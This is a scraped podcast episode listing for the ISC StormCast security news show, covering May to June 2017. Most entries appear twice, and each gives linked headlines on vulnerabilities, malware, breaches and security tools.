Episode Artwork

ISC StormCast for Thursday, June 22nd 2017

New Vulnerabilities Found in OpenVPN https://guidovranken.wordpress.com/2017/06/21/the-openvpn-post-audit-bug-bonanza/ RAR Unpack Vulnerability Affects BitDefender https://bugs.chromium.org/p/project-zero/issues/detail?id=1278&desc=6 Honda Plant Shuts Down Over Wannacry https://www.bleepingcomputer.com/news/security/one-month-later-wannacry-ransomware-is-still-shutting-down-factories/
6/22/20175 minutes
Episode Artwork

ISC StormCast for Thursday, June 22nd 2017

New Vulnerabilities Found in OpenVPN https://guidovranken.wordpress.com/2017/06/21/the-openvpn-post-audit-bug-bonanza/ RAR Unpack Vulnerability Affects BitDefender https://bugs.chromium.org/p/project-zero/issues/detail?id=1278&desc=6 Honda Plant Shuts Down Over Wannacry https://www.bleepingcomputer.com/news/security/one-month-later-wannacry-ransomware-is-still-shutting-down-factories/
6/22/20175 minutes
Episode Artwork

ISC StormCast for Wednesday, June 21st 2017

Cisco Ships Private Key For drmlocal.cisco.com With Video Player https://groups.google.com/forum/#!topic/mozilla.dev.security.policy/T6emeoE-lCU Windows Error Reporting: DFIR Benefits and Privacy Concerns https://isc.sans.edu/forums/diary/Windows+Error+Reporting+DFIR+Benefits+and+Privacy+Concerns/22536/ Deteting Memory Curruption in glibc https://github.com/DhavalKapil/libdheap Let's Encrypt ACME Protocol To Become IETF Standard https://tools.ietf.org/html/draft-ietf-acme-acme-06 Microsoft Publishes Analysis of NSA Exploits https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/
6/21/20175 minutes, 52 seconds
Episode Artwork

ISC StormCast for Wednesday, June 21st 2017

Cisco Ships Private Key For drmlocal.cisco.com With Video Player https://groups.google.com/forum/#!topic/mozilla.dev.security.policy/T6emeoE-lCU Windows Error Reporting: DFIR Benefits and Privacy Concerns https://isc.sans.edu/forums/diary/Windows+Error+Reporting+DFIR+Benefits+and+Privacy+Concerns/22536/ Deteting Memory Curruption in glibc https://github.com/DhavalKapil/libdheap Let's Encrypt ACME Protocol To Become IETF Standard https://tools.ietf.org/html/draft-ietf-acme-acme-06 Microsoft Publishes Analysis of NSA Exploits https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/
6/21/20175 minutes, 52 seconds
Episode Artwork

ISC StormCast for Tuesday, June 20th 2017

Stack Clash Vulnerability Affects Various Unix Based Operating Systems https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt Separation Of Duties / Malicious Administrators https://isc.sans.edu/forums/diary/As+Your+Admin+Walks+Out+the+Door/22530/ Progress in Sattelite Based Quantum Cryptography https://www.wired.com/story/chinese-satellite-relays-a-quantum-signal-between-cities/ https://www.helpnetsecurity.com/2017/06/19/extremely-secure-data-encryption/ Women Connect Event Minneapolis: https://www.sans.org/event/minneapolis-2017/bonus-sessions/12162
6/20/20177 minutes, 19 seconds
Episode Artwork

ISC StormCast for Tuesday, June 20th 2017

Stack Clash Vulnerability Affects Various Unix Based Operating Systems https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt Separation Of Duties / Malicious Administrators https://isc.sans.edu/forums/diary/As+Your+Admin+Walks+Out+the+Door/22530/ Progress in Sattelite Based Quantum Cryptography https://www.wired.com/story/chinese-satellite-relays-a-quantum-signal-between-cities/ https://www.helpnetsecurity.com/2017/06/19/extremely-secure-data-encryption/ Women Connect Event Minneapolis: https://www.sans.org/event/minneapolis-2017/bonus-sessions/12162
6/20/20177 minutes, 19 seconds
Episode Artwork

ISC StormCast for Monday, June 19th 2017

Uptick in Port 83 Traffic https://isc.sans.edu/forums/diary/What+is+going+on+with+Port+83/22524/ WINS DoS Vulnerability will not be fixed by Microsoft https://blog.fortinet.com/2017/06/14/wins-server-remote-memory-corruption-vulnerability-in-microsoft-windows-server Microsoft to Release Patch to Turn off SMB1 https://www.bleepingcomputer.com/news/microsoft/microsoft-to-disable-smbv1-in-windows-starting-this-fall/ UK Hacker Stole Personell Data For US Military Sattelite Network https://public-newsroom-nca-01.azurewebsites.net/news/hacker-stole-satellite-data-from-us-department-of-defence Sophos Web Appliance Will Now Update via https https://community.sophos.com/products/web-appliance/b/blog/posts/release-of-swa-v4-3-2---security-and-defect-fix-rollup
6/19/20175 minutes, 22 seconds
Episode Artwork

ISC StormCast for Monday, June 19th 2017

Uptick in Port 83 Traffic https://isc.sans.edu/forums/diary/What+is+going+on+with+Port+83/22524/ WINS DoS Vulnerability will not be fixed by Microsoft https://blog.fortinet.com/2017/06/14/wins-server-remote-memory-corruption-vulnerability-in-microsoft-windows-server Microsoft to Release Patch to Turn off SMB1 https://www.bleepingcomputer.com/news/microsoft/microsoft-to-disable-smbv1-in-windows-starting-this-fall/ UK Hacker Stole Personell Data For US Military Sattelite Network https://public-newsroom-nca-01.azurewebsites.net/news/hacker-stole-satellite-data-from-us-department-of-defence Sophos Web Appliance Will Now Update via https https://community.sophos.com/products/web-appliance/b/blog/posts/release-of-swa-v4-3-2---security-and-defect-fix-rollup
6/19/20175 minutes, 22 seconds
Episode Artwork

ISC StormCast for Friday, June 16th 2017

WikiLeaks Releases Documents About Cherry Blossom Wifi Hacking Toolkit https://wikileaks.org/vault7/#Cherry%20Blossom More DVR Vulnerabilities https://www.pentestpartners.com/security-blog/what-did-mirai-miss-making-a-better-bigger-botnet/ More Microsoft Windows Defender Vulnerabilities http://www.theregister.co.uk/2017/06/15/microsoft_how_about_sandboxing_windows_defenders_engine/ Decryption Utility For Jaff Crypto Ransomware https://noransom.kaspersky.com Preston Ackerman: Two Factor Authentication by Home End-Users https://www.sans.org/reading-room/whitepapers/authentication/impediments-adoption-two-factor-authentication-home-end-users-37607
6/16/201718 minutes, 8 seconds
Episode Artwork

ISC StormCast for Friday, June 16th 2017

WikiLeaks Releases Documents About Cherry Blossom Wifi Hacking Toolkit https://wikileaks.org/vault7/#Cherry%20Blossom More DVR Vulnerabilities https://www.pentestpartners.com/security-blog/what-did-mirai-miss-making-a-better-bigger-botnet/ More Microsoft Windows Defender Vulnerabilities http://www.theregister.co.uk/2017/06/15/microsoft_how_about_sandboxing_windows_defenders_engine/ Decryption Utility For Jaff Crypto Ransomware https://noransom.kaspersky.com Preston Ackerman: Two Factor Authentication by Home End-Users https://www.sans.org/reading-room/whitepapers/authentication/impediments-adoption-two-factor-authentication-home-end-users-37607
6/16/201718 minutes, 8 seconds
Episode Artwork

ISC StormCast for Thursday, June 15th 2017

Systemd Odd Defaults https://isc.sans.edu/forums/diary/Systemd+Could+Fallback+to+Google+DNS/22516/ Voice over LTE Vulnerabilities https://www.sstic.org/media/SSTIC2017/SSTIC-actes/remote_geolocation_and_tracing_of_subscribers_usin/SSTIC2017-Article-remote_geolocation_and_tracing_of_subscribers_using_4g_volte_android_phone-le-moal_ventuzelo_coudray.pdf Tails 3.0 Released https://tails.boum.org/install/download/index.en.html Nexus 9 Headphone Jack Vulnerability https://alephsecurity.com/2017/06/13/nexus9-ephemeral-fiq/
6/14/20176 minutes, 25 seconds
Episode Artwork

ISC StormCast for Thursday, June 15th 2017

Systemd Odd Defaults https://isc.sans.edu/forums/diary/Systemd+Could+Fallback+to+Google+DNS/22516/ Voice over LTE Vulnerabilities https://www.sstic.org/media/SSTIC2017/SSTIC-actes/remote_geolocation_and_tracing_of_subscribers_usin/SSTIC2017-Article-remote_geolocation_and_tracing_of_subscribers_using_4g_volte_android_phone-le-moal_ventuzelo_coudray.pdf Tails 3.0 Released https://tails.boum.org/install/download/index.en.html Nexus 9 Headphone Jack Vulnerability https://alephsecurity.com/2017/06/13/nexus9-ephemeral-fiq/
6/14/20176 minutes, 25 seconds
Episode Artwork

ISC StormCast for Wednesday, June 14th 2017

MSFT June Patchday Fixes Remaining Known NSA Vulnerabilities https://isc.sans.edu/forums/diary/Microsoft+and+Adobe+June+2017+Patch+Tuesday+Two+Exploited+Vulnerabilities+Patched/22512/ North Korea Building DDoS Botnet https://www.us-cert.gov/ncas/alerts/TA17-164A
6/14/20176 minutes, 29 seconds
Episode Artwork

ISC StormCast for Wednesday, June 14th 2017

MSFT June Patchday Fixes Remaining Known NSA Vulnerabilities https://isc.sans.edu/forums/diary/Microsoft+and+Adobe+June+2017+Patch+Tuesday+Two+Exploited+Vulnerabilities+Patched/22512/ North Korea Building DDoS Botnet https://www.us-cert.gov/ncas/alerts/TA17-164A
6/14/20176 minutes, 29 seconds
Episode Artwork

ISC StormCast for Tuesday, June 13th 2017

Industropyer / CrashOverride Malware Analysis From Power System Attacks https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/ https://dragos.com/blog/crashoverride/CrashOverride-01.pdf MacSpy Spyware As A Service For Macs http://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service VolUtility Memory Analysis Made Easy https://isc.sans.edu/forums/diary/An+Introduction+to+VolUtility/22508/ Google News Abused For Spam http://www.theregister.co.uk/2017/06/12/googles_news_algorithm_serves_up_penis_pills_for_all/
6/13/20175 minutes, 54 seconds
Episode Artwork

ISC StormCast for Tuesday, June 13th 2017

Industropyer / CrashOverride Malware Analysis From Power System Attacks https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/ https://dragos.com/blog/crashoverride/CrashOverride-01.pdf MacSpy Spyware As A Service For Macs http://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service VolUtility Memory Analysis Made Easy https://isc.sans.edu/forums/diary/An+Introduction+to+VolUtility/22508/ Google News Abused For Spam http://www.theregister.co.uk/2017/06/12/googles_news_algorithm_serves_up_penis_pills_for_all/
6/13/20175 minutes, 54 seconds
Episode Artwork

ISC StormCast for Monday, June 12th 2017

SAMBA Vulnerability Exploited To Install Bitcoin Miners https://securelist.com/78674/sambacry-is-coming/ Intel's AMT Technology Used For Covert Channel https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/ Broadcom Vulnerablities to be Announced https://www.blackhat.com/us-17/briefings.html#broadpwn-remotely-compromising-android-and-ios-via-a-bug-in-broadcoms-wi-fi-chipsets Release Lag In National Vulnerablity Database https://www.recordedfuture.com/vulnerability-disclosure-delay/
6/12/20175 minutes, 55 seconds
Episode Artwork

ISC StormCast for Monday, June 12th 2017

SAMBA Vulnerability Exploited To Install Bitcoin Miners https://securelist.com/78674/sambacry-is-coming/ Intel's AMT Technology Used For Covert Channel https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/ Broadcom Vulnerablities to be Announced https://www.blackhat.com/us-17/briefings.html#broadpwn-remotely-compromising-android-and-ios-via-a-bug-in-broadcoms-wi-fi-chipsets Release Lag In National Vulnerablity Database https://www.recordedfuture.com/vulnerability-disclosure-delay/
6/12/20175 minutes, 55 seconds
Episode Artwork

ISC StormCast for Friday, June 9th 2017

Cisco Prime Data Center Network Manager Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170607-dcnm1 https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170607-dcnm2 Oracle Peoplesoft Default Accounts https://erpscan.com/press-center/blog/peoplesoft-default-accounts/ FOSCAM Camera Default Passwords and Other Vulnerabilities http://images.news.f-secure.com/Web/FSecure/%7B43df9e0d-20a8-404a-86d0-70dcca00b6e5%7D_vulnerabilities-in-foscam-IP-cameras_report.pdf Android Malware With Code Injections https://securelist.com/78648/dvmap-the-first-android-malware-with-code-injection/ STI Student John Dittmer: Legal Implication of Vulnerablity Scans https://www.sans.org/reading-room/whitepapers/legal/minimizing-legal-risk-cybersecurity-scanning-tools-37522
6/9/201712 minutes, 32 seconds
Episode Artwork

ISC StormCast for Friday, June 9th 2017

Cisco Prime Data Center Network Manager Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170607-dcnm1 https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170607-dcnm2 Oracle Peoplesoft Default Accounts https://erpscan.com/press-center/blog/peoplesoft-default-accounts/ FOSCAM Camera Default Passwords and Other Vulnerabilities http://images.news.f-secure.com/Web/FSecure/%7B43df9e0d-20a8-404a-86d0-70dcca00b6e5%7D_vulnerabilities-in-foscam-IP-cameras_report.pdf Android Malware With Code Injections https://securelist.com/78648/dvmap-the-first-android-malware-with-code-injection/ STI Student John Dittmer: Legal Implication of Vulnerablity Scans https://www.sans.org/reading-room/whitepapers/legal/minimizing-legal-risk-cybersecurity-scanning-tools-37522
6/9/201712 minutes, 32 seconds
Episode Artwork

ISC StormCast for Thursday, June 8th 2017

Deceptive Advertisements: What They Do And Where They Come From https://isc.sans.edu/forums/diary/Deceptive+Advertisements+What+they+do+and+where+they+come+from/22494/ Instagram as Covert Channel https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/ Domain Shadowing Used in Rik Exploit Kit https://blogs.rsa.com/shadowfall/
6/8/20176 minutes, 2 seconds
Episode Artwork

ISC StormCast for Thursday, June 8th 2017

Deceptive Advertisements: What They Do And Where They Come From https://isc.sans.edu/forums/diary/Deceptive+Advertisements+What+they+do+and+where+they+come+from/22494/ Instagram as Covert Channel https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/ Domain Shadowing Used in Rik Exploit Kit https://blogs.rsa.com/shadowfall/
6/8/20176 minutes, 2 seconds
Episode Artwork

ISC StormCast for Wednesday, June 7th 2017

Finding XOR Keys Part 2 https://isc.sans.edu/forums/diary/Malware+and+XOR+Part+2/22490/ Instagram Stories Not Using TLS https://vvyper.com/2017/05/22/instagram-stories-ssl/ Printer "Dots" May Have Lead to Arrest of NSA Contractor http://blog.erratasec.com/2017/06/how-intercept-outed-reality-winner.html#.WTc9SMbMyRt Exfiltrating Data via Blinking LED https://arxiv.org/abs/1706.01140
6/6/20175 minutes, 28 seconds
Episode Artwork

ISC StormCast for Wednesday, June 7th 2017

Finding XOR Keys Part 2 https://isc.sans.edu/forums/diary/Malware+and+XOR+Part+2/22490/ Instagram Stories Not Using TLS https://vvyper.com/2017/05/22/instagram-stories-ssl/ Printer "Dots" May Have Lead to Arrest of NSA Contractor http://blog.erratasec.com/2017/06/how-intercept-outed-reality-winner.html#.WTc9SMbMyRt Exfiltrating Data via Blinking LED https://arxiv.org/abs/1706.01140
6/6/20175 minutes, 28 seconds
Episode Artwork

ISC StormCast for Tuesday, June 6th 2017

Finding XOR Keys Used To Encode Malware https://isc.sans.edu/forums/diary/Malware+and+XOR+Part+1/22486/ Citywide IMSI Discovery https://seaglass.cs.washington.edu Hijacking Country Level Domains https://thehackerblog.com/the-journey-to-hijacking-a-countrys-tld-the-hidden-risks-of-domain-extensions/index.html
6/6/20177 minutes
Episode Artwork

ISC StormCast for Tuesday, June 6th 2017

Finding XOR Keys Used To Encode Malware https://isc.sans.edu/forums/diary/Malware+and+XOR+Part+1/22486/ Citywide IMSI Discovery https://seaglass.cs.washington.edu Hijacking Country Level Domains https://thehackerblog.com/the-journey-to-hijacking-a-countrys-tld-the-hidden-risks-of-domain-extensions/index.html
6/6/20177 minutes
Episode Artwork

ISC StormCast for Monday, June 5th 2017

Phishing Campaigns for Bitcoin https://isc.sans.edu/forums/diary/Phishing+Campaigns+Follow+Trends/22482/ Mouseover May Trigger Powerpoint Macro https://www.dodgethissecurity.com/2017/06/02/new-powerpoint-mouseover-based-downloader-analysis-results/ Vault 7 "Pandemic" Tool https://wikileaks.org/vault7/document/Pandemic-1_1-S-NF/Pandemic-1_1-S-NF.pdf Mozilla Considering Move Away From OCSP https://bugzilla.mozilla.org/show_bug.cgi?id=1366100 Defending Web Application Security Minneapolis https://www.sans.org/event/minneapolis-2017 Intrusion Detection in Depth Columbia MD https://www.sans.org/event/columbia-2017/course/intrusion-detection-in-depth
6/5/20177 minutes, 34 seconds
Episode Artwork

ISC StormCast for Monday, June 5th 2017

Phishing Campaigns for Bitcoin https://isc.sans.edu/forums/diary/Phishing+Campaigns+Follow+Trends/22482/ Mouseover May Trigger Powerpoint Macro https://www.dodgethissecurity.com/2017/06/02/new-powerpoint-mouseover-based-downloader-analysis-results/ Vault 7 "Pandemic" Tool https://wikileaks.org/vault7/document/Pandemic-1_1-S-NF/Pandemic-1_1-S-NF.pdf Mozilla Considering Move Away From OCSP https://bugzilla.mozilla.org/show_bug.cgi?id=1366100 Defending Web Application Security Minneapolis https://www.sans.org/event/minneapolis-2017 Intrusion Detection in Depth Columbia MD https://www.sans.org/event/columbia-2017/course/intrusion-detection-in-depth
6/5/20177 minutes, 34 seconds
Episode Artwork

ISC StormCast for Friday, June 2nd 2017

Sharing Private Data With Webcast Invitations https://isc.sans.edu/forums/diary/Sharing+Private+Data+with+Webcast+Invitations/22478/ onelogin breach https://www.onelogin.com/blog/may-31-2017-security-incident Google AMP Phishing https://citizenlab.org/2017/05/tainted-leaks-disinformation-phish/ STI Student Paper: Kevin Kelly Tesla Crypt https://www.sans.org/reading-room/whitepapers/bestprac/indicators-compromise-teslacrypt-malware-37622
6/2/201710 minutes, 47 seconds
Episode Artwork

ISC StormCast for Friday, June 2nd 2017

Sharing Private Data With Webcast Invitations https://isc.sans.edu/forums/diary/Sharing+Private+Data+with+Webcast+Invitations/22478/ onelogin breach https://www.onelogin.com/blog/may-31-2017-security-incident Google AMP Phishing https://citizenlab.org/2017/05/tainted-leaks-disinformation-phish/ STI Student Paper: Kevin Kelly Tesla Crypt https://www.sans.org/reading-room/whitepapers/bestprac/indicators-compromise-teslacrypt-malware-37622
6/2/201710 minutes, 47 seconds
Episode Artwork

ISC StormCast for Thursday, June 1st 2017

Analysis of Competing Hypotheses, WCry and Lazarus https://isc.sans.edu/forums/diary/Analysis+of+Competing+Hypotheses+WCry+and+Lazarus+ACH+part+2/22470/ Windows XP Not Stable Enough for WannaCry https://blog.kryptoslogic.com/malware/2017/05/29/two-weeks-later.html Mexican Biker Gang Uses Jeep Database to Steal Car https://regmedia.co.uk/2017/05/31/indictment5_30.pdf Dangers of Public WAS Snapshots https://www.nvteh.com/news/problems-with-public-ebs-snapshots
6/1/20176 minutes, 10 seconds
Episode Artwork

ISC StormCast for Thursday, June 1st 2017

Analysis of Competing Hypotheses, WCry and Lazarus https://isc.sans.edu/forums/diary/Analysis+of+Competing+Hypotheses+WCry+and+Lazarus+ACH+part+2/22470/ Windows XP Not Stable Enough for WannaCry https://blog.kryptoslogic.com/malware/2017/05/29/two-weeks-later.html Mexican Biker Gang Uses Jeep Database to Steal Car https://regmedia.co.uk/2017/05/31/indictment5_30.pdf Dangers of Public WAS Snapshots https://www.nvteh.com/news/problems-with-public-ebs-snapshots
6/1/20176 minutes, 10 seconds
Episode Artwork

ISC StormCast for Wednesday, May 31st 2017

FreeRADIUS Vulnerability https://isc.sans.edu/forums/diary/FreeRadius+Authentication+Bypass/22466/ Microsoft Malware Protection Engine Update http://seclists.org/microsoft/2017/q2/8 Chrome UI Bug May Allow Unnoticed Recording https://medium.com/@barzik/the-new-html5-video-audio-api-has-privacy-issues-on-desktop-chrome-5832c99c7659 AWS Auditing Tools https://summitroute.com/blog/2017/05/30/free_tools_for_auditing_the_security_of_an_aws_account/ SANS Social Denver June 14th https://pages.sans.org/denversocial
5/31/20176 minutes, 32 seconds
Episode Artwork

ISC StormCast for Wednesday, May 31st 2017

FreeRADIUS Vulnerability https://isc.sans.edu/forums/diary/FreeRadius+Authentication+Bypass/22466/ Microsoft Malware Protection Engine Update http://seclists.org/microsoft/2017/q2/8 Chrome UI Bug May Allow Unnoticed Recording https://medium.com/@barzik/the-new-html5-video-audio-api-has-privacy-issues-on-desktop-chrome-5832c99c7659 AWS Auditing Tools https://summitroute.com/blog/2017/05/30/free_tools_for_auditing_the_security_of_an_aws_account/ SANS Social Denver June 14th https://pages.sans.org/denversocial
5/31/20176 minutes, 32 seconds
Episode Artwork

ISC StormCast for Tuesday, May 30th 2017

Analysis of Competing Hypotheses https://isc.sans.edu/forums/diary/Analysis+of+Competing+Hypotheses+ACH+part+1/22460/ Microsoft Master File Table BSOD Exploit http://www.theregister.co.uk/2017/05/29/microsoft_master_file_table_bug_exploited_to_bsod_windows_7_81/ SMTP Split Tunnel / Transparent Proxy Exploit https://blog.securolytics.io/2017/05/split-tunnel-smtp-exploit-explained/
5/30/20177 minutes, 10 seconds
Episode Artwork

ISC StormCast for Tuesday, May 30th 2017

Analysis of Competing Hypotheses https://isc.sans.edu/forums/diary/Analysis+of+Competing+Hypotheses+ACH+part+1/22460/ Microsoft Master File Table BSOD Exploit http://www.theregister.co.uk/2017/05/29/microsoft_master_file_table_bug_exploited_to_bsod_windows_7_81/ SMTP Split Tunnel / Transparent Proxy Exploit https://blog.securolytics.io/2017/05/split-tunnel-smtp-exploit-explained/
5/30/20177 minutes, 10 seconds
Episode Artwork

ISC StormCast for Friday, May 26th 2017

Samba Remote Code Execution Vulnerability https://isc.sans.edu/forums/diary/Critical+Vulnerability+in+Samba+from+350+onwards/22452/ Pacemaker Vulnerabilities http://blog.whitescope.io/2017/05/understanding-pacemaker-systems.html Patching May have Affected Access to Australian Health Systems http://www.cairnspost.com.au/news/cairns-hospital-suffers-software-catastrophe-with-possible-loss-of-patient-data/news-story/c828de3f4a0f73132ec3d19284cbae88
5/25/201713 minutes, 32 seconds
Episode Artwork

ISC StormCast for Friday, May 26th 2017

Samba Remote Code Execution Vulnerability https://isc.sans.edu/forums/diary/Critical+Vulnerability+in+Samba+from+350+onwards/22452/ Pacemaker Vulnerabilities http://blog.whitescope.io/2017/05/understanding-pacemaker-systems.html Patching May have Affected Access to Australian Health Systems http://www.cairnspost.com.au/news/cairns-hospital-suffers-software-catastrophe-with-possible-loss-of-patient-data/news-story/c828de3f4a0f73132ec3d19284cbae88
5/25/201713 minutes, 32 seconds
Episode Artwork

ISC StormCast for Thursday, May 25th 2017

Jaff Ransomware Gets a Makeover https://isc.sans.edu/forums/diary/Jaff+ransomware+gets+a+makeover/22446/ OpenVPN Access Server Vulnerability http://seclists.org/oss-sec/2017/q2/332 Large Credential Dumps Used in Password Brute Forcing Attacks http://info.digitalshadows.com/AccountTakeover-WhitePapersPage_Registration.html
5/25/20176 minutes, 4 seconds
Episode Artwork

ISC StormCast for Thursday, May 25th 2017

Jaff Ransomware Gets a Makeover https://isc.sans.edu/forums/diary/Jaff+ransomware+gets+a+makeover/22446/ OpenVPN Access Server Vulnerability http://seclists.org/oss-sec/2017/q2/332 Large Credential Dumps Used in Password Brute Forcing Attacks http://info.digitalshadows.com/AccountTakeover-WhitePapersPage_Registration.html
5/25/20176 minutes, 4 seconds
Episode Artwork

ISC StormCast for Wednesday, May 24th 2017

Multiple Video Players are Vulnerable to Code Execution via Subtitle Files http://blog.checkpoint.com/2017/05/23/hacked-in-translation/ Samsung Galaxy S8 Iris Scanner Bypass https://www.ccc.de/en/updates/2017/iriden Verizon XSS Flaw in Web Messaging Application https://randywestergren.com/xss-sms-hacking-text-messages-verizon-messages
5/24/20175 minutes, 33 seconds
Episode Artwork

ISC StormCast for Wednesday, May 24th 2017

Multiple Video Players are Vulnerable to Code Execution via Subtitle Files http://blog.checkpoint.com/2017/05/23/hacked-in-translation/ Samsung Galaxy S8 Iris Scanner Bypass https://www.ccc.de/en/updates/2017/iriden Verizon XSS Flaw in Web Messaging Application https://randywestergren.com/xss-sms-hacking-text-messages-verizon-messages
5/24/20175 minutes, 33 seconds
Episode Artwork

ISC StormCast for Tuesday, May 23rd 2017

Fake "Uber Disputes" Site Lures Victims With Valid TLS Certificate https://isc.sans.edu/forums/diary/Investigating+Sites+After+They+are+Gone+And+a+Case+of+Uber+Phishing+With+SSL/22440/ Let's Encrypt Outage http://letsencrypt.status.io/pages/history/55957a99e800baa4470002da https://community.letsencrypt.org/t/ocsp-and-issuance-outage-2017-05-19/34506 More ImageMagik Flaws https://scarybeastsecurity.blogspot.com/2017/05/bleed-continues-18-byte-file-14k-bounty.html
5/23/20176 minutes, 45 seconds
Episode Artwork

ISC StormCast for Tuesday, May 23rd 2017

Fake "Uber Disputes" Site Lures Victims With Valid TLS Certificate https://isc.sans.edu/forums/diary/Investigating+Sites+After+They+are+Gone+And+a+Case+of+Uber+Phishing+With+SSL/22440/ Let's Encrypt Outage http://letsencrypt.status.io/pages/history/55957a99e800baa4470002da https://community.letsencrypt.org/t/ocsp-and-issuance-outage-2017-05-19/34506 More ImageMagik Flaws https://scarybeastsecurity.blogspot.com/2017/05/bleed-continues-18-byte-file-14k-bounty.html
5/23/20176 minutes, 45 seconds
Episode Artwork

ISC StormCast for Monday, May 22nd 2017

Typosquatting: A recent example and what to do with look alike domains https://isc.sans.edu/forums/diary/Typosquatting+Awareness+and+Hunting/22436/ Netgear Collecting Analytics Data in Recent Update https://kb.netgear.com/000038663/What-router-analytics-data-is-collected-and-how-is-the-data-being-used-by-NETGEAR disable: https://kb.netgear.com/000038661/How-do-I-Enable-Disable-Router-Analytics-Data-Collection WannaCry Updates https://venturebeat.com/2017/05/19/ransomware-wannacry-causes-fewer-tears-than-feared/ LastPass Authenticator Cloud Backup https://blog.lastpass.com/2017/05/announcing-cloud-backup-for-lastpass-authenticator-easier-multifactor-security-for-everyone.html/
5/22/20175 minutes, 21 seconds
Episode Artwork

ISC StormCast for Monday, May 22nd 2017

Typosquatting: A recent example and what to do with look alike domains https://isc.sans.edu/forums/diary/Typosquatting+Awareness+and+Hunting/22436/ Netgear Collecting Analytics Data in Recent Update https://kb.netgear.com/000038663/What-router-analytics-data-is-collected-and-how-is-the-data-being-used-by-NETGEAR disable: https://kb.netgear.com/000038661/How-do-I-Enable-Disable-Router-Analytics-Data-Collection WannaCry Updates https://venturebeat.com/2017/05/19/ransomware-wannacry-causes-fewer-tears-than-feared/ LastPass Authenticator Cloud Backup https://blog.lastpass.com/2017/05/announcing-cloud-backup-for-lastpass-authenticator-easier-multifactor-security-for-everyone.html/
5/22/20175 minutes, 21 seconds
Episode Artwork

ISC StormCast for Friday, May 19th 2017

Discovering Relevant CVEs with CVE Bot https://isc.sans.edu/forums/diary/My+Little+CVE+Bot/22432/ Probablility of Vulnerability Re-Discovery https://papers.ssrn.com/sol3/papers.cfm?abstract_id=2928758 Wannakey May Recover WannaCry Keys https://github.com/aguinet/wannakey Finding Bad With Splunk https://www.sans.org/reading-room/whitepapers/critical/finding-bad-splunk-3748
5/19/201713 minutes, 8 seconds
Episode Artwork

ISC StormCast for Friday, May 19th 2017

Discovering Relevant CVEs with CVE Bot https://isc.sans.edu/forums/diary/My+Little+CVE+Bot/22432/ Probablility of Vulnerability Re-Discovery https://papers.ssrn.com/sol3/papers.cfm?abstract_id=2928758 Wannakey May Recover WannaCry Keys https://github.com/aguinet/wannakey Finding Bad With Splunk https://www.sans.org/reading-room/whitepapers/critical/finding-bad-splunk-3748
5/19/201713 minutes, 8 seconds
Episode Artwork

ISC StormCast for Thursday, May 18th 2017

Handbreak Proton Malware Used to Steal Sourcecode https://panic.com/blog/stolen-source-code/ NIST Password Guidance Update https://isc.sans.edu/forums/diary/Wait+What+We+dont+have+to+change+passwords+every+90+days/22428/ Exploiting XXE Vulnerabilities in Peoplesoft https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce
5/18/20175 minutes, 26 seconds
Episode Artwork

ISC StormCast for Thursday, May 18th 2017

Handbreak Proton Malware Used to Steal Sourcecode https://panic.com/blog/stolen-source-code/ NIST Password Guidance Update https://isc.sans.edu/forums/diary/Wait+What+We+dont+have+to+change+passwords+every+90+days/22428/ Exploiting XXE Vulnerabilities in Peoplesoft https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce
5/18/20175 minutes, 26 seconds
Episode Artwork

ISC StormCast for Wednesday, May 17th 2017

Docusign Breach Leads to Increase in Phishing Email https://trust.docusign.com/en-us/personal-safeguards/ HP Updates Audio Drivers (twice) to Remove Keylogger https://support.hp.com/us-en/document/c05519670 Chrome File Download Behaviour Can Lead to SMB Credential Theft http://defensecode.com/news_article.php?id=21
5/17/20175 minutes, 34 seconds
Episode Artwork

ISC StormCast for Wednesday, May 17th 2017

Docusign Breach Leads to Increase in Phishing Email https://trust.docusign.com/en-us/personal-safeguards/ HP Updates Audio Drivers (twice) to Remove Keylogger https://support.hp.com/us-en/document/c05519670 Chrome File Download Behaviour Can Lead to SMB Credential Theft http://defensecode.com/news_article.php?id=21
5/17/20175 minutes, 34 seconds
Episode Artwork

ISC StormCast for Tuesday, May 16th 2017

Apple Updates Everything https://support.apple.com/en-us/HT201222 OpenVPN Audit Results https://www.privateinternetaccess.com/blog/2017/05/openvpn-2-4-evaluation-summary-report/ Italian Car Insurance Leaks User Driving Data https://www.andreascarpino.it/posts/how-my-car-insurance-exposed-my-position.html
5/16/20176 minutes, 54 seconds
Episode Artwork

ISC StormCast for Tuesday, May 16th 2017

Apple Updates Everything https://support.apple.com/en-us/HT201222 OpenVPN Audit Results https://www.privateinternetaccess.com/blog/2017/05/openvpn-2-4-evaluation-summary-report/ Italian Car Insurance Leaks User Driving Data https://www.andreascarpino.it/posts/how-my-car-insurance-exposed-my-position.html
5/16/20176 minutes, 54 seconds
Episode Artwork

ISC StormCast for Monday, May 15th 2017

WannaCry Malware Links Latest updates see https://isc.sans.edu Webcast: https://www.sans.org/webcasts/special-webcast-wannacry-ransomeware-threat-105160 PowerPoint: https://isc.sans.edu/presentations/WannaCry.ppt
5/15/20177 minutes, 11 seconds
Episode Artwork

ISC StormCast for Monday, May 15th 2017

